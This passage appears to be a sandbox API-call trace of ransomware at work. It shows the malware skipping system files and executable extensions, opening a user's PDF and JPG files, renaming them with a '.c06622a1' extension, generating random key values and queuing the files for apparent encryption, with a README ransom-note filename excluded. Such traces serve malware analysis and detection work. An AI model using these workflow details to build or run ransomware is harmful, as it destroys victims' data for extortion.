[0147.848] _wcsicmp (_Str1="autorun.inf", _Str2="aLxsOiDGUFDq.pdf") returned 9 [0147.848] wcslen (_String="autorun.inf") returned 0xb [0147.848] _wcsicmp (_Str1="boot.ini", _Str2="aLxsOiDGUFDq.pdf") returned 1 [0147.848] wcslen (_String="boot.ini") returned 0x8 [0147.848] _wcsicmp (_Str1="bootfont.bin", _Str2="aLxsOiDGUFDq.pdf") returned 1 [0147.848] wcslen (_String="bootfont.bin") returned 0xc [0147.848] _wcsicmp (_Str1="bootsect.bak", _Str2="aLxsOiDGUFDq.pdf") returned 1 [0147.848] wcslen (_String="bootsect.bak") returned 0xc [0147.848] _wcsicmp (_Str1="desktop.ini", _Str2="aLxsOiDGUFDq.pdf") returned 3 [0147.848] wcslen (_String="desktop.ini") returned 0xb [0147.848] _wcsicmp (_Str1="iconcache.db", _Str2="aLxsOiDGUFDq.pdf") returned 8 [0147.848] wcslen (_String="iconcache.db") returned 0xc [0147.848] _wcsicmp (_Str1="ntldr", _Str2="aLxsOiDGUFDq.pdf") returned 13 [0147.848] wcslen (_String="ntldr") returned 0x5 [0147.848] _wcsicmp (_Str1="ntuser.dat", _Str2="aLxsOiDGUFDq.pdf") returned 13 [0147.848] wcslen (_String="ntuser.dat") returned 0xa [0147.848] _wcsicmp (_Str1="ntuser.dat.log", _Str2="aLxsOiDGUFDq.pdf") returned 13 [0147.848] wcslen (_String="ntuser.dat.log") returned 0xe [0147.848] _wcsicmp (_Str1="ntuser.ini", _Str2="aLxsOiDGUFDq.pdf") returned 13 [0147.848] wcslen (_String="ntuser.ini") returned 0xa [0147.848] _wcsicmp (_Str1="thumbs.db", _Str2="aLxsOiDGUFDq.pdf") returned 19 [0147.848] wcslen (_String="thumbs.db") returned 0x9 [0147.848] _wcsicmp (_Str1="386", _Str2="pdf") returned -61 [0147.848] wcslen (_String="386") returned 0x3 [0147.849] _wcsicmp (_Str1="adv", _Str2="pdf") returned -15 [0147.849] wcslen (_String="adv") returned 0x3 [0147.849] _wcsicmp (_Str1="ani", _Str2="pdf") returned -15 [0147.849] wcslen (_String="ani") returned 0x3 [0147.849] _wcsicmp (_Str1="bat", _Str2="pdf") returned -14 [0147.849] wcslen (_String="bat") returned 0x3 [0147.849] _wcsicmp (_Str1="bin", _Str2="pdf") returned -14 [0147.849] wcslen (_String="bin") returned 0x3 [0147.849] _wcsicmp (_Str1="cab", _Str2="pdf") returned -13 [0147.849] wcslen (_String="cab") returned 0x3 [0147.849] _wcsicmp (_Str1="cmd", _Str2="pdf") returned -13 [0147.849] wcslen (_String="cmd") returned 0x3 [0147.849] _wcsicmp (_Str1="com", _Str2="pdf") returned -13 [0147.849] wcslen (_String="com") returned 0x3 [0147.849] _wcsicmp (_Str1="cpl", _Str2="pdf") returned -13 [0147.849] wcslen (_String="cpl") returned 0x3 [0147.849] _wcsicmp (_Str1="cur", _Str2="pdf") returned -13 [0147.849] wcslen (_String="cur") returned 0x3 [0147.849] _wcsicmp (_Str1="deskthemepack", _Str2="pdf") returned -12 [0147.849] wcslen (_String="deskthemepack") returned 0xd [0147.849] _wcsicmp (_Str1="diagcab", _Str2="pdf") returned -12 [0147.849] wcslen (_String="diagcab") returned 0x7 [0147.849] _wcsicmp (_Str1="diagcfg", _Str2="pdf") returned -12 [0147.849] wcslen (_String="diagcfg") returned 0x7 [0147.849] _wcsicmp (_Str1="diagpkg", _Str2="pdf") returned -12 [0147.849] wcslen (_String="diagpkg") returned 0x7 [0147.849] _wcsicmp (_Str1="dll", _Str2="pdf") returned -12 [0147.849] wcslen (_String="dll") returned 0x3 [0147.849] _wcsicmp (_Str1="drv", _Str2="pdf") returned -12 [0147.849] wcslen (_String="drv") returned 0x3 [0147.849] _wcsicmp (_Str1="exe", _Str2="pdf") returned -11 [0147.849] wcslen (_String="exe") returned 0x3 [0147.849] _wcsicmp (_Str1="hlp", _Str2="pdf") returned -8 [0147.849] wcslen (_String="hlp") returned 0x3 [0147.849] _wcsicmp (_Str1="icl", _Str2="pdf") returned -7 [0147.849] wcslen (_String="icl") returned 0x3 [0147.849] _wcsicmp (_Str1="icns", _Str2="pdf") returned -7 [0147.849] wcslen (_String="icns") returned 0x4 [0147.850] _wcsicmp (_Str1="ico", _Str2="pdf") returned -7 [0147.850] wcslen (_String="ico") returned 0x3 [0147.850] _wcsicmp (_Str1="ics", _Str2="pdf") returned -7 [0147.850] wcslen (_String="ics") returned 0x3 [0147.850] _wcsicmp (_Str1="idx", _Str2="pdf") returned -7 [0147.850] wcslen (_String="idx") returned 0x3 [0147.850] _wcsicmp (_Str1="ldf", _Str2="pdf") returned -4 [0147.850] wcslen (_String="ldf") returned 0x3 [0147.850] _wcsicmp (_Str1="lnk", _Str2="pdf") returned -4 [0147.850] wcslen (_String="lnk") returned 0x3 [0147.850] _wcsicmp (_Str1="mod", _Str2="pdf") returned -3 [0147.850] wcslen (_String="mod") returned 0x3 [0147.850] _wcsicmp (_Str1="mpa", _Str2="pdf") returned -3 [0147.850] wcslen (_String="mpa") returned 0x3 [0147.850] _wcsicmp (_Str1="msc", _Str2="pdf") returned -3 [0147.850] wcslen (_String="msc") returned 0x3 [0147.850] _wcsicmp (_Str1="msp", _Str2="pdf") returned -3 [0147.850] wcslen (_String="msp") returned 0x3 [0147.850] _wcsicmp (_Str1="msstyles", _Str2="pdf") returned -3 [0147.850] wcslen (_String="msstyles") returned 0x8 [0147.850] _wcsicmp (_Str1="msu", _Str2="pdf") returned -3 [0147.850] wcslen (_String="msu") returned 0x3 [0147.850] _wcsicmp (_Str1="nls", _Str2="pdf") returned -2 [0147.850] wcslen (_String="nls") returned 0x3 [0147.850] _wcsicmp (_Str1="nomedia", _Str2="pdf") returned -2 [0147.850] wcslen (_String="nomedia") returned 0x7 [0147.850] _wcsicmp (_Str1="ocx", _Str2="pdf") returned -1 [0147.850] wcslen (_String="ocx") returned 0x3 [0147.850] _wcsicmp (_Str1="prf", _Str2="pdf") returned 14 [0147.850] wcslen (_String="prf") returned 0x3 [0147.850] _wcsicmp (_Str1="ps1", _Str2="pdf") returned 15 [0147.850] wcslen (_String="ps1") returned 0x3 [0147.850] _wcsicmp (_Str1="rom", _Str2="pdf") returned 2 [0147.850] wcslen (_String="rom") returned 0x3 [0147.850] _wcsicmp (_Str1="rtp", _Str2="pdf") returned 2 [0147.850] wcslen (_String="rtp") returned 0x3 [0147.850] _wcsicmp (_Str1="scr", _Str2="pdf") returned 3 [0147.850] wcslen (_String="scr") returned 0x3 [0147.851] _wcsicmp (_Str1="shs", _Str2="pdf") returned 3 [0147.851] wcslen (_String="shs") returned 0x3 [0147.851] _wcsicmp (_Str1="spl", _Str2="pdf") returned 3 [0147.851] wcslen (_String="spl") returned 0x3 [0147.851] _wcsicmp (_Str1="sys", _Str2="pdf") returned 3 [0147.851] wcslen (_String="sys") returned 0x3 [0147.851] _wcsicmp (_Str1="theme", _Str2="pdf") returned 4 [0147.851] wcslen (_String="theme") returned 0x5 [0147.851] _wcsicmp (_Str1="themepack", _Str2="pdf") returned 4 [0147.851] wcslen (_String="themepack") returned 0x9 [0147.851] _wcsicmp (_Str1="wpx", _Str2="pdf") returned 7 [0147.851] wcslen (_String="wpx") returned 0x3 [0147.851] _wcsicmp (_Str1="lock", _Str2="pdf") returned -4 [0147.851] wcslen (_String="lock") returned 0x4 [0147.851] _wcsicmp (_Str1="key", _Str2="pdf") returned -5 [0147.851] wcslen (_String="key") returned 0x3 [0147.851] _wcsicmp (_Str1="hta", _Str2="pdf") returned -8 [0147.851] wcslen (_String="hta") returned 0x3 [0147.851] _wcsicmp (_Str1="msi", _Str2="pdf") returned -3 [0147.851] wcslen (_String="msi") returned 0x3 [0147.851] _wcsicmp (_Str1="pdb", _Str2="pdf") returned -4 [0147.851] wcslen (_String="pdb") returned 0x3 [0147.851] _wcsicmp (_Str1="sql", _Str2="pdf") returned 3 [0147.851] wcslen (_String="sql") returned 0x3 [0147.851] _wcsicmp (_Str1="sqlite", _Str2="pdf") returned 3 [0147.851] wcslen (_String="sqlite") returned 0x6 [0147.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 0x10 [0147.851] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.851] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" [0147.851] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned 0x30 [0147.851] wcscpy (in: _Dest=0x45000f2, _Source="aLxsOiDGUFDq.pdf" | out: _Dest="aLxsOiDGUFDq.pdf") returned="aLxsOiDGUFDq.pdf" [0147.851] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf", dwFileAttributes=0x80) returned 1 [0147.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\alxsoidgufdq.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0147.852] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.852] ReadFile (in: hFile=0x61c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.853] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xaa21da5e [0147.853] RtlComputeCrc32 (PartialCrc=0xda5e, Buffer=0x3fe8f4, Length=0x80) returned 0xa1035214 [0147.853] RtlComputeCrc32 (PartialCrc=0x5214, Buffer=0x3fe8f4, Length=0x80) returned 0x8d3ed505 [0147.853] RtlComputeCrc32 (PartialCrc=0xd505, Buffer=0x3fe8f4, Length=0x80) returned 0x1101eb8e [0147.853] RtlComputeCrc32 (PartialCrc=0xeb8e, Buffer=0x3fe8f4, Length=0x80) returned 0x4f74bf43 [0147.853] CloseHandle (hObject=0x61c) returned 1 [0147.853] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.853] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf" [0147.853] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf") returned 0x41 [0147.853] wcscpy (in: _Dest=0x451011a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.853] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\alxsoidgufdq.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\alxsoidgufdq.pdf.c06622a1"), dwFlags=0x8) returned 1 [0147.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\aLxsOiDGUFDq.pdf.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\alxsoidgufdq.pdf.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0147.855] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.855] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4e370a6a [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x496fd5a6 [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a229d46 [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x750df3ee [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8604cd2 [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1c787f21 [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x685c916c [0147.861] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xcd3302d [0147.864] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x4aab4384 [0147.864] RtlComputeCrc32 (PartialCrc=0x4384, Buffer=0x4700094, Length=0x80) returned 0xc099043b [0147.864] RtlComputeCrc32 (PartialCrc=0x43b, Buffer=0x4700094, Length=0x80) returned 0x936b0fb4 [0147.864] RtlComputeCrc32 (PartialCrc=0xfb4, Buffer=0x4700094, Length=0x80) returned 0xb0a63349 [0147.864] RtlComputeCrc32 (PartialCrc=0x3349, Buffer=0x4700094, Length=0x80) returned 0x8432e8f4 [0147.864] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0147.864] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0147.864] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0147.864] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b012730, ftCreationTime.dwHighDateTime=0x1d5decc, ftLastAccessTime.dwLowDateTime=0xc013a190, ftLastAccessTime.dwHighDateTime=0x1d5e3b7, ftLastWriteTime.dwLowDateTime=0xc013a190, ftLastWriteTime.dwHighDateTime=0x1d5e3b7, nFileSizeHigh=0x0, nFileSizeLow=0x7995, dwReserved0=0x0, dwReserved1=0x0, cFileName="dKUv_cpHglR.jpg", cAlternateFileName="DKUV_C~1.JPG")) returned 1 [0147.864] _wcsicmp (_Str1="dKUv_cpHglR.jpg", _Str2="README.c06622a1.TXT") returned -14 [0147.864] wcsstr (_Str="dKUv_cpHglR.jpg", _SubStr="README") returned 0x0 [0147.864] _wcsicmp (_Str1="autorun.inf", _Str2="dKUv_cpHglR.jpg") returned -3 [0147.864] wcslen (_String="autorun.inf") returned 0xb [0147.864] _wcsicmp (_Str1="boot.ini", _Str2="dKUv_cpHglR.jpg") returned -2 [0147.864] wcslen (_String="boot.ini") returned 0x8 [0147.864] _wcsicmp (_Str1="bootfont.bin", _Str2="dKUv_cpHglR.jpg") returned -2 [0147.864] wcslen (_String="bootfont.bin") returned 0xc [0147.864] _wcsicmp (_Str1="bootsect.bak", _Str2="dKUv_cpHglR.jpg") returned -2 [0147.864] wcslen (_String="bootsect.bak") returned 0xc [0147.864] _wcsicmp (_Str1="desktop.ini", _Str2="dKUv_cpHglR.jpg") returned -6 [0147.864] wcslen (_String="desktop.ini") returned 0xb [0147.865] _wcsicmp (_Str1="iconcache.db", _Str2="dKUv_cpHglR.jpg") returned 5 [0147.865] wcslen (_String="iconcache.db") returned 0xc [0147.865] _wcsicmp (_Str1="ntldr", _Str2="dKUv_cpHglR.jpg") returned 10 [0147.865] wcslen (_String="ntldr") returned 0x5 [0147.865] _wcsicmp (_Str1="ntuser.dat", _Str2="dKUv_cpHglR.jpg") returned 10 [0147.865] wcslen (_String="ntuser.dat") returned 0xa [0147.865] _wcsicmp (_Str1="ntuser.dat.log", _Str2="dKUv_cpHglR.jpg") returned 10 [0147.865] wcslen (_String="ntuser.dat.log") returned 0xe [0147.865] _wcsicmp (_Str1="ntuser.ini", _Str2="dKUv_cpHglR.jpg") returned 10 [0147.865] wcslen (_String="ntuser.ini") returned 0xa [0147.865] _wcsicmp (_Str1="thumbs.db", _Str2="dKUv_cpHglR.jpg") returned 16 [0147.865] wcslen (_String="thumbs.db") returned 0x9 [0147.865] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0147.865] wcslen (_String="386") returned 0x3 [0147.865] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0147.865] wcslen (_String="adv") returned 0x3 [0147.865] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0147.865] wcslen (_String="ani") returned 0x3 [0147.865] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0147.865] wcslen (_String="bat") returned 0x3 [0147.865] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0147.865] wcslen (_String="bin") returned 0x3 [0147.865] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0147.865] wcslen (_String="cab") returned 0x3 [0147.865] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0147.865] wcslen (_String="cmd") returned 0x3 [0147.865] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0147.865] wcslen (_String="com") returned 0x3 [0147.865] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0147.865] wcslen (_String="cpl") returned 0x3 [0147.865] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0147.865] wcslen (_String="cur") returned 0x3 [0147.865] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0147.865] wcslen (_String="deskthemepack") returned 0xd [0147.865] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0147.865] wcslen (_String="diagcab") returned 0x7 [0147.865] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0147.866] wcslen (_String="diagcfg") returned 0x7 [0147.866] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0147.866] wcslen (_String="diagpkg") returned 0x7 [0147.866] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0147.866] wcslen (_String="dll") returned 0x3 [0147.866] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0147.866] wcslen (_String="drv") returned 0x3 [0147.866] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0147.866] wcslen (_String="exe") returned 0x3 [0147.866] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0147.866] wcslen (_String="hlp") returned 0x3 [0147.866] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0147.866] wcslen (_String="icl") returned 0x3 [0147.866] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0147.866] wcslen (_String="icns") returned 0x4 [0147.866] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0147.866] wcslen (_String="ico") returned 0x3 [0147.866] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0147.866] wcslen (_String="ics") returned 0x3 [0147.866] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0147.866] wcslen (_String="idx") returned 0x3 [0147.866] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0147.866] wcslen (_String="ldf") returned 0x3 [0147.866] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0147.866] wcslen (_String="lnk") returned 0x3 [0147.866] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0147.866] wcslen (_String="mod") returned 0x3 [0147.866] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0147.866] wcslen (_String="mpa") returned 0x3 [0147.866] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0147.866] wcslen (_String="msc") returned 0x3 [0147.866] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0147.866] wcslen (_String="msp") returned 0x3 [0147.866] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0147.866] wcslen (_String="msstyles") returned 0x8 [0147.866] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0147.866] wcslen (_String="msu") returned 0x3 [0147.867] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0147.867] wcslen (_String="nls") returned 0x3 [0147.867] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0147.867] wcslen (_String="nomedia") returned 0x7 [0147.867] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0147.867] wcslen (_String="ocx") returned 0x3 [0147.867] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0147.867] wcslen (_String="prf") returned 0x3 [0147.867] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0147.867] wcslen (_String="ps1") returned 0x3 [0147.867] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0147.867] wcslen (_String="rom") returned 0x3 [0147.867] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0147.867] wcslen (_String="rtp") returned 0x3 [0147.867] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0147.867] wcslen (_String="scr") returned 0x3 [0147.867] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0147.867] wcslen (_String="shs") returned 0x3 [0147.867] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0147.867] wcslen (_String="spl") returned 0x3 [0147.867] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0147.867] wcslen (_String="sys") returned 0x3 [0147.867] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0147.867] wcslen (_String="theme") returned 0x5 [0147.867] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0147.867] wcslen (_String="themepack") returned 0x9 [0147.867] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0147.867] wcslen (_String="wpx") returned 0x3 [0147.867] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0147.867] wcslen (_String="lock") returned 0x4 [0147.867] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0147.867] wcslen (_String="key") returned 0x3 [0147.867] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0147.867] wcslen (_String="hta") returned 0x3 [0147.867] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0147.867] wcslen (_String="msi") returned 0x3 [0147.867] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0147.867] wcslen (_String="pdb") returned 0x3 [0147.868] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0147.868] wcslen (_String="sql") returned 0x3 [0147.868] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0147.868] wcslen (_String="sqlite") returned 0x6 [0147.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue")) returned 0x10 [0147.868] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0147.868] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue" [0147.868] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue") returned 0x30 [0147.868] wcscpy (in: _Dest=0x45000f2, _Source="dKUv_cpHglR.jpg" | out: _Dest="dKUv_cpHglR.jpg") returned="dKUv_cpHglR.jpg" [0147.868] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg", dwFileAttributes=0x80) returned 1 [0147.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\dkuv_cphglr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x654 [0147.868] SetFilePointerEx (in: hFile=0x654, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.868] ReadFile (in: hFile=0x654, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0147.869] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x42f66da9 [0147.869] RtlComputeCrc32 (PartialCrc=0x6da9, Buffer=0x3fe8f4, Length=0x80) returned 0xa30c3a6f [0147.869] RtlComputeCrc32 (PartialCrc=0x3a6f, Buffer=0x3fe8f4, Length=0x80) returned 0x6f243be3 [0147.869] RtlComputeCrc32 (PartialCrc=0x3be3, Buffer=0x3fe8f4, Length=0x80) returned 0x4d63612e [0147.869] RtlComputeCrc32 (PartialCrc=0x612e, Buffer=0x3fe8f4, Length=0x80) returned 0xfe94b618 [0147.869] CloseHandle (hObject=0x654) returned 1 [0147.869] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0147.869] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg" [0147.869] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg") returned 0x40 [0147.869] wcscpy (in: _Dest=0x4510118, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.869] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\dkuv_cphglr.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\dkuv_cphglr.jpg.c06622a1"), dwFlags=0x8) returned 1 [0147.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\h-Hlue\\dKUv_cpHglR.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\h-hlue\\dkuv_cphglr.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x654 [0147.872] CreateIoCompletionPort (FileHandle=0x654, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.872] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0147.877] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2729395e [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x504045e0 [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7622f37c [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6bf6009a [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e63c232 [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x29266149 [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1212200e [0147.878] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c2a5922 